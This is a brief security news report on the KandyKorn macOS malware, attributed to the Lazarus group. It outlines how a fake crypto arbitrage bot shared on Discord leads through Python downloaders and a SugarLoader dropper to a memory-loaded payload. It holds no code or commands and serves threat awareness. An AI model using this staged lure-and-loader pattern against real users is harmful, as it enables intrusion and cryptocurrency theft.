A new macOS malware dubbed 'KandyKorn' has been spotted in a campaign attributed to the North Korean Lazarus hacking group, targeting blockchain engineers of a cryptocurrency exchange platform.
The attackers impersonate members of the cryptocurrency community on Discord channels to spread Python-based modules that trigger a multi-stage KandyKorn infection chain.
Elastic Security
discovered and attributed the attacks to Lazarus based on overlaps with past campaigns concerning the employed techniques, network infrastructure, code-signing certificates, and custom Lazarus detection rules.
The attack, which starts on Discord, starts with social engineering attacks on targets to trick them into downloading a malicious ZIP archive named 'Cross-platform Bridges.zip.'
The victim is misled into believing they are downloading a legitimate arbitrage bot designed for automated profit generation from cryptocurrency transactions.
Instead, the contained Python script ('Main.py') will import 13 modules from an equal number of scripts in the ZIP, launching the first payload, 'Watcher.py.'
Watcher.py is a downloader that unpacks and executes a second Python script named 'testSpeed.py' along with another Python file named 'FinderTools,' downloaded from a Google Drive URL.
FinderTools is a dropper that fetches and launches an obfuscated binary named 'SugarLoader,' which appears under two names and instances, as an .sld and a .log Mach-O executables.
Sugarloader establishes a connection with the command and control (C2) server to get and load the final payload, KandyKorn, into memory using reflective binary loading.
